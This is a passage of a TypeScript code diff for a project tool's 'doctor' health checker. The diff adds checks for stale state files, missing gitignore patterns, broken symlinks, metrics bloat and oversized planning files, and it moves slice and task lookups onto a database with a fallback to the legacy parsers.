+        if (current.milestone !== fresh.milestone || current.slice !== fresh.slice || current.phase !== fresh.phase) {
+          issues.push({
+            severity: "warning",
+            code: "state_file_stale",
+            scope: "project",
+            unitId: "project",
+            message: `STATE.md is stale — shows "${current.phase}" but derived state is "${fresh.phase}"`,
+            file: ".gsd/STATE.md",
+            fixable: true,
+          });
+
+          if (shouldFix("state_file_stale")) {
+            await saveFile(stateFilePath, freshContent);
+            fixesApplied.push("rebuilt STATE.md from derived state");
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — STATE.md check failed
+  }
+
+  // ── Gitignore drift ───────────────────────────────────────────────────
+  try {
+    const gitignorePath = join(basePath, ".gitignore");
+    if (existsSync(gitignorePath) && nativeIsRepo(basePath)) {
+      const content = readFileSync(gitignorePath, "utf-8");
+      const existingLines = new Set(
+        content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#")),
+      );
+
+      // Check for critical runtime patterns that must be present
+      const criticalPatterns = [
+        ".gsd/activity/",
+        ".gsd/runtime/",
+        ".gsd/auto.lock",
+        ".gsd/gsd.db",
+        ".gsd/completed-units.json",
+      ];
+
+      // If blanket .gsd/ or .gsd is present, all patterns are covered
+      const hasBlanketIgnore = existingLines.has(".gsd/") || existingLines.has(".gsd");
+
+      if (!hasBlanketIgnore) {
+        const missing = criticalPatterns.filter(p => !existingLines.has(p));
+        if (missing.length > 0) {
+          issues.push({
+            severity: "warning",
+            code: "gitignore_missing_patterns",
+            scope: "project",
+            unitId: "project",
+            message: `${missing.length} critical GSD runtime pattern(s) missing from .gitignore: ${missing.join(", ")}`,
+            file: ".gitignore",
+            fixable: true,
+          });
+
+          if (shouldFix("gitignore_missing_patterns")) {
+            ensureGitignore(basePath);
+            fixesApplied.push("added missing GSD runtime patterns to .gitignore");
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — gitignore check failed
+  }
+
+  // ── External state symlink health ──────────────────────────────────────
+  try {
+    const localGsd = join(basePath, ".gsd");
+    if (existsSync(localGsd)) {
+      const stat = lstatSync(localGsd);
+
+      // Check for .gsd.migrating (failed migration)
+      const migratingPath = join(basePath, ".gsd.migrating");
+      if (existsSync(migratingPath)) {
+        issues.push({
+          severity: "error",
+          code: "failed_migration",
+          scope: "project",
+          unitId: "project",
+          message: "Found .gsd.migrating — a previous external state migration failed. State may be incomplete.",
+          file: ".gsd.migrating",
+          fixable: true,
+        });
+
+        if (shouldFix("failed_migration")) {
+          if (recoverFailedMigration(basePath)) {
+            fixesApplied.push("recovered failed migration (.gsd.migrating → .gsd)");
+          }
+        }
+      }
+
+      // Check symlink target exists
+      if (stat.isSymbolicLink()) {
+        try {
+          realpathSync(localGsd);
+        } catch {
+          issues.push({
+            severity: "error",
+            code: "broken_symlink",
+            scope: "project",
+            unitId: "project",
+            message: ".gsd symlink target does not exist. External state directory may have been deleted.",
+            file: ".gsd",
+            fixable: false,
+          });
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — external state check failed
+  }
+
+  // ── Numbered .gsd collision variants (#2205) ───────────────────────────
+  // macOS APFS can create ".gsd 2", ".gsd 3" etc. when a directory blocks
+  // symlink creation. These must be removed so the canonical .gsd is used.
+  try {
+    const variantPattern = /^\.gsd \d+$/;
+    const entries = readdirSync(basePath);
+    const variants = entries.filter(e => variantPattern.test(e));
+    if (variants.length > 0) {
+      for (const v of variants) {
+        issues.push({
+          severity: "warning",
+          code: "numbered_gsd_variant",
+          scope: "project",
+          unitId: "project",
+          message: `Found macOS collision variant "${v}" — this can cause GSD state to appear deleted.`,
+          file: v,
+          fixable: true,
+        });
+      }
+
+      if (shouldFix("numbered_gsd_variant")) {
+        const removed = cleanNumberedGsdVariants(basePath);
+        for (const name of removed) {
+          fixesApplied.push(`removed numbered .gsd variant: ${name}`);
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — variant check failed
+  }
+
+  // ── Metrics ledger integrity ───────────────────────────────────────────
+  try {
+    const metricsPath = join(root, "metrics.json");
+    if (existsSync(metricsPath)) {
+      try {
+        const raw = readFileSync(metricsPath, "utf-8");
+        const ledger = JSON.parse(raw);
+        if (ledger.version !== 1 || !Array.isArray(ledger.units)) {
+          issues.push({
+            severity: "warning",
+            code: "metrics_ledger_corrupt",
+            scope: "project",
+            unitId: "project",
+            message: "metrics.json has an unexpected structure (version !== 1 or units is not an array) — metrics data may be unreliable",
+            file: ".gsd/metrics.json",
+            fixable: false,
+          });
+        }
+      } catch {
+        issues.push({
+          severity: "warning",
+          code: "metrics_ledger_corrupt",
+          scope: "project",
+          unitId: "project",
+          message: "metrics.json is not valid JSON — metrics data may be corrupt",
+          file: ".gsd/metrics.json",
+          fixable: false,
+        });
+      }
+    }
+  } catch {
+    // Non-fatal — metrics check failed
+  }
+
+  // ── Metrics ledger bloat ──────────────────────────────────────────────
+  // The metrics ledger has no TTL and grows by one entry per completed unit.
+  // At 50 units/day a project can accumulate tens of thousands of entries over
+  // months of use. Prune to the newest 1500 when the threshold is exceeded.
+  try {
+    const metricsFilePath = join(root, "metrics.json");
+    if (existsSync(metricsFilePath)) {
+      try {
+        const raw = readFileSync(metricsFilePath, "utf-8");
+        const parsed = JSON.parse(raw);
+        const BLOAT_UNITS_THRESHOLD = 2000;
+        if (parsed.version === 1 && Array.isArray(parsed.units) && parsed.units.length > BLOAT_UNITS_THRESHOLD) {
+          const fileSizeMB = (statSync(metricsFilePath).size / (1024 * 1024)).toFixed(1);
+          issues.push({
+            severity: "warning",
+            code: "metrics_ledger_bloat",
+            scope: "project",
+            unitId: "project",
+            message: `metrics.json has ${parsed.units.length} unit entries (${fileSizeMB}MB) — threshold is ${BLOAT_UNITS_THRESHOLD}. Run /gsd doctor --fix to prune to the newest 1500 entries.`,
+            file: ".gsd/metrics.json",
+            fixable: true,
+          });
+          if (shouldFix("metrics_ledger_bloat")) {
+            const { pruneMetricsLedger } = await import("./metrics.js");
+            const removed = pruneMetricsLedger(basePath, 1500);
+            fixesApplied.push(`pruned metrics ledger: removed ${removed} oldest entries (${parsed.units.length - removed} remain)`);
+          }
+        }
+      } catch {
+        // JSON parse failed — already handled by the integrity check above
+      }
+    }
+  } catch {
+    // Non-fatal — metrics bloat check failed
+  }
+
+  // ── Large planning file detection ──────────────────────────────────────
+  // Files over 100KB can cause LLM context pressure. Report the worst offenders.
+  try {
+    const MAX_FILE_BYTES = 100 * 1024; // 100KB
+    const milestonesPath = milestonesDir(basePath);
+    if (existsSync(milestonesPath)) {
+      const largeFiles: Array<{ path: string; sizeKB: number }> = [];
+      function scanForLargeFiles(dir: string, depth = 0): void {
+        if (depth > 6) return;
+        try {
+          for (const entry of readdirSync(dir)) {
+            const full = join(dir, entry);
+            try {
+              const s = statSync(full);
+              if (s.isDirectory()) { scanForLargeFiles(full, depth + 1); continue; }
+              if (entry.endsWith(".md") && s.size > MAX_FILE_BYTES) {
+                largeFiles.push({ path: full.replace(basePath + "/", ""), sizeKB: Math.round(s.size / 1024) });
+              }
+            } catch { /* skip entry */ }
+          }
+        } catch { /* skip dir */ }
+      }
+      scanForLargeFiles(milestonesPath);
+      if (largeFiles.length > 0) {
+        largeFiles.sort((a, b) => b.sizeKB - a.sizeKB);
+        const worst = largeFiles[0]!;
+        issues.push({
+          severity: "warning",
+          code: "large_planning_file",
+          scope: "project",
+          unitId: "project",
+          message: `${largeFiles.length} planning file(s) exceed 100KB — largest: ${worst.path} (${worst.sizeKB}KB). Large files cause LLM context pressure.`,
+          file: worst.path,
+          fixable: false,
+        });
+      }
+    }
+  } catch {
+    // Non-fatal — large file scan failed
+  }
+
+  // ── Snapshot ref bloat ────────────────────────────────────────────────
+  // refs/gsd/snapshots/ accumulate over time. Prune to newest 5 per label
+  // when total count exceeds threshold.
+  try {
+    if (nativeIsRepo(basePath)) {
+      const refs = nativeForEachRef(basePath, "refs/gsd/snapshots/");
+      if (refs.length > 50) {
+        issues.push({
+          severity: "warning",
+          code: "snapshot_ref_bloat",
+          scope: "project",
+          unitId: "project",
+          message: `${refs.length} snapshot refs found under refs/gsd/snapshots/ — pruning to newest 5 per label will reclaim git storage`,
+          fixable: true,
+        });
+
+        if (shouldFix("snapshot_ref_bloat")) {
+          const byLabel = new Map<string, string[]>();
+          for (const ref of refs) {
+            const parts = ref.split("/");
+            const label = parts.slice(0, -1).join("/");
+            if (!byLabel.has(label)) byLabel.set(label, []);
+            byLabel.get(label)!.push(ref);
+          }
+          let pruned = 0;
+          for (const [, labelRefs] of byLabel) {
+            const sorted = labelRefs.sort();
+            for (const old of sorted.slice(0, -5)) {
+              try {
+                nativeUpdateRef(basePath, old);
+                pruned++;
+              } catch { /* skip */ }
+            }
+          }
+          if (pruned > 0) {
+            fixesApplied.push(`pruned ${pruned} old snapshot ref(s)`);
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — snapshot ref check failed
+  }
+}
+
+/**
+ * Build STATE.md markdown content from derived state.
+ * Local helper used by checkRuntimeHealth for STATE.md drift detection and repair.
+ */
+function buildStateMarkdownForCheck(state: Awaited<ReturnType<typeof deriveState>>): string {
+  const lines: string[] = [];
+  lines.push("# GSD State", "");
+
+  const activeMilestone = state.activeMilestone
+    ? `${state.activeMilestone.id}: ${state.activeMilestone.title}`
+    : "None";
+  const activeSlice = state.activeSlice
+    ? `${state.activeSlice.id}: ${state.activeSlice.title}`
+    : "None";
+
+  lines.push(`**Active Milestone:** ${activeMilestone}`);
+  lines.push(`**Active Slice:** ${activeSlice}`);
+  lines.push(`**Phase:** ${state.phase}`);
+  if (state.requirements) {
+    lines.push(`**Requirements Status:** ${state.requirements.active} active · ${state.requirements.validated} validated · ${state.requirements.deferred} deferred · ${state.requirements.outOfScope} out of scope`);
+  }
+  lines.push("");
+  lines.push("## Milestone Registry");
+
+  for (const entry of state.registry) {
+    const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C";
+    lines.push(`- ${glyph} **${entry.id}:** ${entry.title}`);
+  }
+
+  lines.push("");
+  lines.push("## Recent Decisions");
+  if (state.recentDecisions.length > 0) {
+    for (const decision of state.recentDecisions) lines.push(`- ${decision}`);
+  } else {
+    lines.push("- None recorded");
+  }
+
+  lines.push("");
+  lines.push("## Blockers");
+  if (state.blockers.length > 0) {
+    for (const blocker of state.blockers) lines.push(`- ${blocker}`);
+  } else {
+    lines.push("- None");
+  }
+
+  lines.push("");
+  lines.push("## Next Action");
+  lines.push(state.nextAction || "None");
+  lines.push("");
+
+  return lines.join("\n");
+}
diff --git a/src/resources/extensions/gsd/doctor-types.ts b/src/resources/extensions/gsd/doctor-types.ts
index 29bce4f7b..8c804b3b8 100644
--- a/src/resources/extensions/gsd/doctor-types.ts
+++ b/src/resources/extensions/gsd/doctor-types.ts
@@ -3,13 +3,6 @@ export type DoctorIssueCode =
   | "invalid_preferences"
   | "missing_tasks_dir"
   | "missing_slice_plan"
-  | "task_done_missing_summary"
-  | "task_summary_without_done_checkbox"
-  | "all_tasks_done_missing_slice_summary"
-  | "all_tasks_done_missing_slice_uat"
-  | "all_tasks_done_roadmap_not_checked"
-  | "slice_checked_missing_summary"
-  | "slice_checked_missing_uat"
   | "all_slices_done_missing_milestone_validation"
   | "all_slices_done_missing_milestone_summary"
   | "task_done_must_haves_not_verified"
@@ -33,6 +26,7 @@ export type DoctorIssueCode =
   | "unresolvable_dependency"
   | "failed_migration"
   | "broken_symlink"
+  | "numbered_gsd_variant"
   // Environment health checks (#1221)
   | "env_node_version"
   | "env_dependencies"
@@ -67,6 +61,8 @@ export type DoctorIssueCode =
   | "worktree_stale"
   | "worktree_dirty"
   | "worktree_unpushed"
+  // Stale commit safety check
+  | "stale_uncommitted_changes"
   // Snapshot ref bloat
   | "snapshot_ref_bloat"
   // Runtime data integrity
@@ -76,23 +72,13 @@ export type DoctorIssueCode =
   | "large_planning_file"
   // Slow environment checks (opt-in via --build / --test flags)
   | "env_build"
-  | "env_test";
-
-/**
- * Issue codes that represent expected completion-transition states.
- * These are detected by the doctor but should NOT be auto-fixed at task level —
- * they are resolved by the complete-slice/complete-milestone dispatch units.
- * Consumers (e.g. auto-post-unit health tracking) should exclude these from
- * error counts when running at task fixLevel to avoid false escalation.
- *
- * Only the slice summary is deferred here because it requires LLM-generated
- * content.  Roadmap checkbox and UAT stub are mechanical bookkeeping and are
- * fixed immediately to avoid inconsistent state if the session stops before
- * complete-slice runs (#1808).
- */
-export const COMPLETION_TRANSITION_CODES = new Set<DoctorIssueCode>([
-  "all_tasks_done_missing_slice_summary",
-]);
+  | "env_test"
+  // Engine health checks (Phase 4)
+  | "db_orphaned_task"
+  | "db_orphaned_slice"
+  | "db_done_task_no_summary"
+  | "db_duplicate_id"
+  | "projection_drift";
 
 /**
  * Issue codes that represent global or completion-critical state.
diff --git a/src/resources/extensions/gsd/doctor.ts b/src/resources/extensions/gsd/doctor.ts
index c7daa6b47..b10362efc 100644
--- a/src/resources/extensions/gsd/doctor.ts
+++ b/src/resources/extensions/gsd/doctor.ts
@@ -1,16 +1,18 @@
 import { existsSync, mkdirSync, lstatSync, readdirSync, readFileSync } from "node:fs";
 import { join } from "node:path";
 
-import { loadFile, parsePlan, parseRoadmap, parseSummary, saveFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js";
+import { loadFile, parseSummary, saveFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js";
+import { parseRoadmap as parseLegacyRoadmap, parsePlan as parseLegacyPlan } from "./parsers-legacy.js";
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
 import { resolveMilestoneFile, resolveMilestonePath, resolveSliceFile, resolveSlicePath, resolveTaskFile, resolveTasksDir, milestonesDir, gsdRoot, relMilestoneFile, relSliceFile, relTaskFile, relSlicePath, relGsdRootFile, resolveGsdRootFile, relMilestonePath } from "./paths.js";
 import { deriveState, isMilestoneComplete } from "./state.js";
 import { invalidateAllCaches } from "./cache.js";
 import { loadEffectiveGSDPreferences, type GSDPreferences } from "./preferences.js";
 
 import type { DoctorIssue, DoctorIssueCode, DoctorReport } from "./doctor-types.js";
-import { COMPLETION_TRANSITION_CODES, GLOBAL_STATE_CODES } from "./doctor-types.js";
+import { GLOBAL_STATE_CODES } from "./doctor-types.js";
 import type { RoadmapSliceEntry } from "./types.js";
-import { checkGitHealth, checkRuntimeHealth, checkGlobalHealth } from "./doctor-checks.js";
+import { checkGitHealth, checkRuntimeHealth, checkGlobalHealth, checkEngineHealth } from "./doctor-checks.js";
 import { checkEnvironmentHealth } from "./doctor-environment.js";
 import { runProviderChecks } from "./doctor-providers.js";
 
@@ -85,7 +87,8 @@ function validatePreferenceShape(preferences: GSDPreferences): string[] {
   return issues;
 }
 
-function buildStateMarkdown(state: Awaited<ReturnType<typeof deriveState>>): string {
+/** Build STATE.md content from derived state. Exported for guided-flow pre-dispatch rebuild (#3475). */
+export function buildStateMarkdown(state: Awaited<ReturnType<typeof deriveState>>): string {
   const lines: string[] = [];
   lines.push("# GSD State", "");
 
@@ -149,167 +152,6 @@ export async function rebuildState(basePath: string): Promise<void> {
   await saveFile(path, buildStateMarkdown(state));
 }
 
-async function ensureSliceSummaryStub(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise<void> {
-  const path = join(resolveSlicePath(basePath, milestoneId, sliceId) ?? relSlicePath(basePath, milestoneId, sliceId), `${sliceId}-SUMMARY.md`);
-  const absolute = resolveSliceFile(basePath, milestoneId, sliceId, "SUMMARY") ?? join(resolveSlicePath(basePath, milestoneId, sliceId)!, `${sliceId}-SUMMARY.md`);
-  const content = [
-    "---",
-    `id: ${sliceId}`,
-    `parent: ${milestoneId}`,
-    `milestone: ${milestoneId}`,
-    "provides: []",
-    "requires: []",
-    "affects: []",
-    "key_files: []",
-    "key_decisions: []",
-    "patterns_established: []",
-    "observability_surfaces:",
-    "  - none yet \u2014 doctor created placeholder summary; replace with real diagnostics before treating as complete",
-    "drill_down_paths: []",
-    "duration: unknown",
-    "verification_result: unknown",
-    `completed_at: ${new Date().toISOString()}`,
-    "---",
-    "",
-    `# ${sliceId}: Recovery placeholder summary`,
-    "",
-    "**Doctor-created placeholder.**",
-    "",
-    "## What Happened",
-    "Doctor detected that all tasks were complete but the slice summary was missing. Replace this with a real compressed slice summary before relying on it.",
-    "",
-    "## Verification",
-    "Not re-run by doctor.",
-    "",
-    "## Deviations",
-    "Recovery placeholder created to restore required artifact shape.",
-    "",
-    "## Known Limitations",
-    "This file is intentionally incomplete and should be replaced by a real summary.",
-    "",
-    "## Follow-ups",
-    "- Regenerate this summary from task summaries.",
-    "",
-    "## Files Created/Modified",
-    `- \`${relSliceFile(basePath, milestoneId, sliceId, "SUMMARY")}\` \u2014 doctor-created placeholder summary`,
-    "",
-    "## Forward Intelligence",
-    "",
-    "### What the next slice should know",
-    "- Doctor had to reconstruct completion artifacts; inspect task summaries before continuing.",
-    "",
-    "### What's fragile",
-    "- Placeholder summary exists solely to unblock invariant checks.",
-    "",
-    "### Authoritative diagnostics",
-    "- Task summaries in the slice tasks/ directory \u2014 they are the actual authoritative source until this summary is rewritten.",
-    "",
-    "### What assumptions changed",
-    "- The system assumed completion would always write a slice summary; in practice doctor may need to restore missing artifacts.",
-    "",
-  ].join("\n");
-  await saveFile(absolute, content);
-  fixesApplied.push(`created placeholder ${absolute}`);
-}
-
-async function ensureSliceUatStub(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise<void> {
-  const sDir = resolveSlicePath(basePath, milestoneId, sliceId);
-  if (!sDir) return;
-  const absolute = join(sDir, `${sliceId}-UAT.md`);
-  const content = [
-    `# ${sliceId}: Recovery placeholder UAT`,
-    "",
-    `**Milestone:** ${milestoneId}`,
-    `**Written:** ${new Date().toISOString()}`,
-    "",
-    "## Preconditions",
-    "- Doctor created this placeholder because the expected UAT file was missing.",
-    "",
-    "## Smoke Test",
-    "- Re-run the slice verification from the slice plan before shipping.",
-    "",
-    "## Test Cases",
-    "### 1. Replace this placeholder",
-    "1. Read the slice plan and task summaries.",
-    "2. Write a real UAT script.",
-    "3. **Expected:** This placeholder is replaced with meaningful human checks.",
-    "",
-    "## Edge Cases",
-    "### Missing completion artifacts",
-    "1. Confirm the summary, roadmap checkbox, and state file are coherent.",
-    "2. **Expected:** GSD doctor reports no remaining completion drift for this slice.",
-    "",
-    "## Failure Signals",
-    "- Placeholder content still present when treating the slice as done",
-    "",
-    "## Notes for Tester",
-    "Doctor created this file only to restore the required artifact shape. Replace it with a real UAT script.",
-    "",
-  ].join("\n");
-  await saveFile(absolute, content);
-  fixesApplied.push(`created placeholder ${absolute}`);
-}
-
-async function markTaskDoneInPlan(basePath: string, milestoneId: string, sliceId: string, taskId: string, fixesApplied: string[]): Promise<void> {
-  const planPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN");
-  if (!planPath) return;
-  const content = await loadFile(planPath);
-  if (!content) return;
-  const updated = content.replace(
-    new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${taskId}:`, "m"),
-    `$1[x] **${taskId}:`,
-  );
-  if (updated !== content) {
-    await saveFile(planPath, updated);
-    fixesApplied.push(`marked ${taskId} done in ${planPath}`);
-  }
-}
-
-async function markTaskUndoneInPlan(basePath: string, milestoneId: string, sliceId: string, taskId: string, fixesApplied: string[]): Promise<void> {
-  const planPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN");
-  if (!planPath) return;
-  const content = await loadFile(planPath);
-  if (!content) return;
-  const updated = content.replace(
-    new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${taskId}:`, "mi"),
-    `$1[ ] **${taskId}:`,
-  );
-  if (updated !== content) {
-    await saveFile(planPath, updated);
-    fixesApplied.push(`unchecked ${taskId} in ${planPath} (missing summary — task will re-execute)`);
-  }
-}
-
-async function markSliceDoneInRoadmap(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise<void> {
-  const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
-  if (!roadmapPath) return;
-  const content = await loadFile(roadmapPath);
-  if (!content) return;
-  const updated = content.replace(
-    new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${sliceId}:`, "m"),
-    `$1[x] **${sliceId}:`,
-  );
-  if (updated !== content) {
-    await saveFile(roadmapPath, updated);
-    fixesApplied.push(`marked ${sliceId} done in ${roadmapPath}`);
-  }
-}
-
-async function markSliceUndoneInRoadmap(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise<void> {
-  const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
-  if (!roadmapPath) return;
-  const content = await loadFile(roadmapPath);
-  if (!content) return;
-  const updated = content.replace(
-    new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${sliceId}:`, "m"),
-    `$1[ ] **${sliceId}:`,
-  );
-  if (updated !== content) {
-    await saveFile(roadmapPath, updated);
-    fixesApplied.push(`unmarked ${sliceId} in ${roadmapPath} (premature completion)`);
-  }
-}
-
 function matchesScope(unitId: string, scope?: string): boolean {
   if (!scope) return true;
   return unitId === scope || unitId.startsWith(`${scope}/`);
@@ -374,8 +216,14 @@ export async function selectDoctorScope(basePath: string, requestedScope?: strin
     const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP");
     const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
     if (!roadmapContent) continue;
-    const roadmap = parseRoadmap(roadmapContent);
-    if (!isMilestoneComplete(roadmap)) return milestone.id;
+    if (isDbAvailable()) {
+      const dbSlices = getMilestoneSlices(milestone.id);
+      const allDone = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete");
+      if (!allDone) return milestone.id;
+    } else {
+      const roadmap = parseLegacyRoadmap(roadmapContent);
+      if (!isMilestoneComplete(roadmap)) return milestone.id;
+    }
   }
 
   return state.registry[0]?.id;
@@ -490,18 +338,10 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
   /** Whether a given issue code should be auto-fixed at the current fixLevel. */
   const shouldFix = (code: DoctorIssueCode): boolean => {
     if (!fix || dryRun) return false;
-    if (fixLevel === "task" && COMPLETION_TRANSITION_CODES.has(code)) return false;
     if (fixLevel === "task" && GLOBAL_STATE_CODES.has(code)) return false;
     return true;
   };
 
-  /** Log a dry-run "would fix" entry when fix=true but dryRun=true. */
-  const dryRunCanFix = (code: DoctorIssueCode, message: string): void => {
-    if (dryRun && fix && !(fixLevel === "task" && COMPLETION_TRANSITION_CODES.has(code))) {
-      fixesApplied.push(`[dry-run] would fix: ${message}`);
-    }
-  };
-
   const prefs = loadEffectiveGSDPreferences();
   if (prefs) {
     const prefIssues = validatePreferenceShape(prefs.preferences);
@@ -521,8 +361,8 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
   // Git health checks — timed
   const t0git = Date.now();
   const isolationMode: "none" | "worktree" | "branch" = options?.isolationMode ??
-    (prefs?.preferences?.git?.isolation === "none" ? "none" :
-    prefs?.preferences?.git?.isolation === "branch" ? "branch" : "worktree");
+    (prefs?.preferences?.git?.isolation === "worktree" ? "worktree" :
+    prefs?.preferences?.git?.isolation === "branch" ? "branch" : "none");
   await checkGitHealth(basePath, issues, fixesApplied, shouldFix, isolationMode);
   const gitMs = Date.now() - t0git;
 
@@ -543,6 +383,9 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
   });
   const envMs = Date.now() - t0env;
 
+  // Engine health checks — DB constraints and projection drift
+  await checkEngineHealth(basePath, issues, fixesApplied);
+
   const milestonesPath = milestonesDir(basePath);
   if (!existsSync(milestonesPath)) {
     const report: DoctorReport = { ok: issues.every(i => i.severity !== "error"), basePath, issues, fixesApplied, timing: { git: gitMs, runtime: runtimeMs, environment: envMs, gsdState: 0 } };
@@ -629,7 +472,34 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
     const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
     const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
     if (!roadmapContent) continue;
-    const roadmap = parseRoadmap(roadmapContent);
+
+    // Normalize slices: prefer DB, fall back to parser
+    type NormSlice = RoadmapSliceEntry & { pending?: boolean };
+    let slices: NormSlice[];
+    if (isDbAvailable()) {
+      const dbSlices = getMilestoneSlices(milestoneId);
+      slices = dbSlices.map(s => ({
+        id: s.id,
+        title: s.title,
+        done: s.status === "complete",
+        pending: s.status === "pending",
+        risk: (s.risk || "medium") as RoadmapSliceEntry["risk"],
+        depends: s.depends,
+        demo: s.demo,
+      }));
+    } else {
+      const activeMilestoneId = state.activeMilestone?.id;
+      const activeSliceId = state.activeSlice?.id;
+      slices = parseLegacyRoadmap(roadmapContent).slices.map(s => ({
+        ...s,
+        // Legacy roadmaps only encode done vs not-done. For doctor's
+        // missing-directory checks, treat every undone slice except the
+        // current active slice as effectively pending/unstarted.
+        pending: !s.done && (milestoneId !== activeMilestoneId || s.id !== activeSliceId),
+      }));
+    }
+    // Wrap in Roadmap-compatible shape for detectCircularDependencies
+    const roadmap = { slices };
 
     // ── Circular dependency detection ──────────────────────────────────────
     for (const cycle of detectCircularDependencies(roadmap.slices)) {
@@ -707,6 +577,9 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
 
       const slicePath = resolveSlicePath(basePath, milestoneId, slice.id);
       if (!slicePath) {
+        // Pending slices haven't been planned yet — directories are created
+        // lazily by ensurePreconditions() at dispatch time. Skip them.
+        if (slice.pending) continue;
         const expectedPath = relSlicePath(basePath, milestoneId, slice.id);
         issues.push({
           severity: slice.done ? "warning" : "error",
@@ -729,6 +602,8 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
 
       const tasksDir = resolveTasksDir(basePath, milestoneId, slice.id);
       if (!tasksDir) {
+        // Pending slices haven't been planned yet — tasks/ is created on demand.
+        if (slice.pending) continue;
         issues.push({
           severity: slice.done ? "warning" : "error",
           code: "missing_tasks_dir",
@@ -748,7 +623,17 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
 
       const planPath = resolveSliceFile(basePath, milestoneId, slice.id, "PLAN");
       const planContent = planPath ? await loadFile(planPath) : null;
-      const plan = planContent ? parsePlan(planContent) : null;
+      // Normalize plan tasks: prefer DB, fall back to parsers-legacy
+      let plan: { tasks: Array<{ id: string; done: boolean; title: string; estimate?: string }> } | null = null;
+      if (isDbAvailable()) {
+        const dbTasks = getSliceTasks(milestoneId, slice.id);
+        if (dbTasks.length > 0) {
+          plan = { tasks: dbTasks.map(t => ({ id: t.id, done: t.status === "complete" || t.status === "done", title: t.title, estimate: t.estimate || undefined })) };
+        }
+      }
+      if (!plan && planContent) {
+        plan = parseLegacyPlan(planContent);
+      }
       if (!plan) {
         if (!slice.done) {
           issues.push({
@@ -792,42 +677,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
       } catch { /* non-fatal */ }
 
       let allTasksDone = plan.tasks.length > 0;
-      let taskUncheckedByDoctor = false;
       for (const task of plan.tasks) {
         const taskUnitId = `${unitId}/${task.id}`;
         const summaryPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "SUMMARY");
         const hasSummary = !!(summaryPath && await loadFile(summaryPath));
 
-        if (task.done && !hasSummary) {
-          issues.push({
-            severity: "error",
-            code: "task_done_missing_summary",
-            scope: "task",
-            unitId: taskUnitId,
-            message: `Task ${task.id} is marked done but summary is missing — unchecking so it re-executes`,
-            file: relSliceFile(basePath, milestoneId, slice.id, "PLAN"),
-            fixable: true,
-          });
-          dryRunCanFix("task_done_missing_summary", `uncheck ${task.id} in plan for ${taskUnitId}`);
-          if (shouldFix("task_done_missing_summary")) {
-            await markTaskUndoneInPlan(basePath, milestoneId, slice.id, task.id, fixesApplied);
-            taskUncheckedByDoctor = true;
-          }
-        }
-
-        if (!task.done && hasSummary) {
-          issues.push({
-            severity: "warning",
-            code: "task_summary_without_done_checkbox",
-            scope: "task",
-            unitId: taskUnitId,
-            message: `Task ${task.id} has a summary but is not marked done in the slice plan`,
-            file: relSliceFile(basePath, milestoneId, slice.id, "PLAN"),
-            fixable: true,
-          });
-          if (fix) await markTaskDoneInPlan(basePath, milestoneId, slice.id, task.id, fixesApplied);
-        }
-
         // Must-have verification
         if (task.done && hasSummary) {
           const taskPlanPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "PLAN");
@@ -875,18 +729,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
         allTasksDone = allTasksDone && task.done;
       }
 
-      // ── #1850: cascade slice uncheck when task_done_missing_summary fires ──
-      // When doctor unchecks tasks inside a done slice, the slice must also be
-      // unchecked so the state machine re-enters the executing phase. Without
-      // this, state.ts skips done slices and the unchecked tasks never run,
-      // causing doctor to fire again on every start (infinite loop).
-      if (taskUncheckedByDoctor && slice.done) {
-        await markSliceUndoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied);
-      }
-
       // Blocker-without-replan detection
+      // Skip when all tasks are done — the blocker was implicitly resolved
+      // within the task and the slice is not stuck (#3105 Bug 2).
       const replanPath = resolveSliceFile(basePath, milestoneId, slice.id, "REPLAN");
-      if (!replanPath) {
+      if (!replanPath && !allTasksDone) {
         for (const task of plan.tasks) {
           if (!task.done) continue;
           const summaryPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "SUMMARY");
@@ -916,88 +763,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
           file: relSliceFile(basePath, milestoneId, slice.id, "REPLAN"), fixable: false });
       }
 
-      const sliceSummaryPath = resolveSliceFile(basePath, milestoneId, slice.id, "SUMMARY");
-      const sliceUatPath = join(slicePath, `${slice.id}-UAT.md`);
